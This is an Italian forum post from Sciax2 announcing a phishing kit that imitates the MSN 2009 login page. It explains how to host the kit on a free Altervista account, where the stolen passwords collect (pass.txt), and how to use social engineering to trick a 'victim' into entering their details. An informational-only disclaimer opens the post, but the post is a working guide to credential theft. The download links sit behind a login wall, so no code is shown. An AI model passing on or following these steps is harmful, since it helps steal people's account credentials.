PREMESSA:
Questo progetto è stato creato al solo scopo informativo e non a scopi di lucro. Quindi dico esplicitamente che nè io nè lo Sciax2 Forum ci assumiamo qualsiasi responsabilità sull'uso che ne facciate e a quale scopo. Grazie per l' Attenzione!Salve a tutti. Oggi dopo 5 giorni di lavoro ho completato il mio secondo fakelogin di msn che cerca di imitare il nuovo LOGIN di MSN 2009.
------------------------------------------------------------------------------------
Allora il post si dividerà in due parti:
- Guida All' Utilizzo
- Download Fakelogin
------------------------------------------------------------------------------------
Guida All' Utilizzo:
Allora per prima cosa ci basterà creare un account da
Perfavore,
Entra
oppure
Registrati
per vedere i Link!
.Se non sapete farlo ci sono tante guide al riguardo quindi usate il tasto "Cerca".
Dopo aver creato l'account eliminiamo tutto quello che c'è al suo interno (index.html e index.wlm).
OK!! Ora l'archio è vuoto e non dobbiamo fare altro che aprire il file .rar (download sotto) aprire la cartella (fakelogin by Giuseppe) ed estrarre i file presenti al suo interno. Quindi sul nostro Desktop avremo:
- indexi_files (cartella)
- login_files (cartella)
- indexi (file.htm)
- login (file php)
- nuovo file (file di estensione sconosciuta)
- nuovo file~ (file di estensione sconosciuta)
Al termine dell'operazione il nostro fakelogin è pronto e possiamo visualizzarlo da qui:
tuosito.altervista.org/indexi.htm

tuosito.altervista.org/pass.txt
Ora con un pò di social engineers (disponibili molte guide al riguardo) potete invitare la vittima ad accedere così da prendere i suoi dati.
Download:
Download
Perfavore,
Entra
oppure
Registrati
per vedere i Link!
.VirusTotal
Perfavore,
Entra
oppure
Registrati